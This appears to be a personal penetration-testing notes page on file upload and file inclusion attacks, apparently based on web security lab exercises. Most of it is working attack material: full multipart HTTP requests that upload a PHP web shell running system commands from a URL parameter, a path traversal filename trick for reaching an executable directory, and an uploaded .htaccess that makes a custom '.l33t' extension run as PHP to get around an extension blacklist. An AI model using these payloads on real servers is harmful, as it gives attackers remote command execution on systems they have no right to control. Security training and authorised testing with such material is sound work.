[FILE INCLUSION ATTACKS]
GENERAL INFORMATION
QUESTION TO ANSWER Is this happening client or server-side...? notes: --> if this file type is non-executable, such as an image or a static HTML page, the server may just send the file's contents to the client in the HTTP response. --> if the file type is executable, such as PHP file, and the server is configured to execute files of this type, it will assign variables based on the headers and parameters in the HTTP request before running the script. the resulting output may then be sent to the client in an HTTP response. --> if the file type is executable, but the server is not configured to execute files of this type it will generally respond with an error. however in some cases the contents of the file may still be served to the client as plain text. such configurations can occasionally be exploited to leak source code and other sensitive information. TO CHECK: 1. It is happening locally or not, open dev tools and check network tab for interactions. 2. Caido or burp is your best friend here, inspect all requests. 3. Be aware of file extention > content type > magic bytes 4. Test all previous options. PHP: .php | .php1 | .php3 | .phtml IMG: .img | .png | .jpeg PLAINTEXT: .txt To try: 1. Change filename extention. 2. Change content type. 3. Add the webshell to the content, sample, image. [jpg, png, etc] SAMPLE POST REQUEST ------WebKitFormBoundaryiL3FsJfTWvA7Aw9B Content-Disposition: form-data; name="avatar"; filename="me2.php" Content-Type: image/jpegLOCAL FILE INCLUSION
DESCRIPTION: Collection of tools/commands to use when testing for local file inclusion vulnerabilities. LFIREMOTE FILE INCLUSION
DESCRIPTION: Collection of tools/commands to use when testing for remote file inclusion vulnerabilities. RFI :::: VIA PATH TRAVERSAL NOTE: Basicaly the techniques used when attempting path traversal can be used. it is chain of vulnerabilities to exploit the function. to accomplish this you already need to have the way to upload .php files and the restriction you are facing is that the folder where is stored the is not allowed to execute php scripts. so, there's one way to bypass the functions and it using the path traversal vulnerability to upload the php file and call from other place to try if the folder is allowing the exection of php files. >> SAMPLE: -REQUEST POST /my-account/avatar HTTP/1.1 Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://machetevault.com/my-account?id=test Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxx4ZBSf7IF4INbDK Cookie: session=aJLEFa1aOrMRT7qfoAmDJrvyjEkoYyLD ------WebKitFormBoundaryxx4ZBSf7IF4INbDK Content-Disposition: form-data; name="avatar"; filename="exploit.php" Content-Type: text/php <?php echo system($_GET['command']); ?> ------WebKitFormBoundaryxx4ZBSf7IF4INbDK Content-Disposition: form-data; name="user" wiener ------WebKitFormBoundaryxx4ZBSf7IF4INbDK Content-Disposition: form-data; name="csrf" QZE9swn3US3RvXoq0zs1pYBE7kuo42gl ------WebKitFormBoundaryxx4ZBSf7IF4INbDK-- NOTE: Content-Disposition Encoded >>> Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php" Sometimes it is needed to encode the values as sometimes the application harden or strip characters. once the file is uploaded, RESPONSE HTTP/1.1 200 OK Date: Sun, 02 Feb 2025 00:30:25 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: close Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Length: 135 The file avatars/../exploit.php has been uploaded.<a href="/my-account" title="Return to previous page"<« Back to My Account</a<
You see the file was successfully uploaded, so, you need to go one folder back to test if the file is there. :::: EXTENSION BLACKLIST BYPASS Such blacklists can sometimes be bypassed by using lesser known, alternative file extensions that may still be executable, such as .php5, .shtml, and so on. > OVERRIDE SERVER CONFIG servers typically won't execute files unless they have been configured to do so. before an Apache server will execute PHP files requested by a client, developers might have to edit /etc/apache2/apache2.conf Many servers also allow developers to create special configuration files within individual directories in order to override or add to one or more of the global settings. Apache servers, for example, will load a directory-specific configuration from a file called .htaccess if one is present. similarly, developers can make directory-specific configuration on IIS servers using a web.config file. so, you may occasionally find servers that fail to stop you from uploading your own malicious configuration file. In this case, even if the file extension you need is blacklisted, you may be able to trick the server into mapping an arbitrary, custom file extension to an executable MIME type. _SAMPLE_ REQUEST: POST /my-account/avatar HTTP/1.1 Referer: https://machetevault.com/my-account Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: session=Amvce1GTzrJM44dIQ4z5yBIb0lnqiGS6 ------WebKitFormBoundaryvzIa21H4a0qAp0T0 Content-Disposition: form-data; name="avatar"; filename="cumbia.php" Content-Type: text/php <?php echo system($_GET['command']); ?> ------WebKitFormBoundaryvzIa21H4a0qAp0T0 Content-Disposition: form-data; name="user" RESPONSE: HTTP/1.1 403 Forbidden Date: Sun, 02 Feb 2025 01:45:46 GMT Server: Apache/2.4.41 (Ubuntu) Keep-Alive: timeout=5, max=100 Connection: close Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Length: 164 Sorry, php files are not allowed. >> EXPLOIT the response provide information about the web server you are working on, so you can search for default config files associated to the webserver you found. to attempt to force the app to use a different config file, you need to change a couple of parameters on the content disposition of the request. > FROM ------WebKitFormBoundaryvzIa21H4a0qAp0T0 Content-Disposition: form-data; name="avatar"; filename="cumbia.php" Content-Type: text/php <?php echo system($_GET['command']); ?> > TO ------WebKitFormBoundaryvzIa21H4a0qAp0T0 Content-Disposition: form-data; name="avatar"; filename=".htaccess" Content-Type: text/plain AddType application/x-httpd-php .l33t AND so we modified the payload itself to force the server to use a new extension file as a valid extension to execute php payloads. so, the next step is to upload the exploit with the extension we just allowed. [.l33t] ------WebKitFormBoundaryvzIa21H4a0qAp0T0 Content-Disposition: form-data; name="avatar"; filename="cumbia.l33t" Content-Type: text/php <?php echo system($_GET['command']); ?>
©® - Since 2023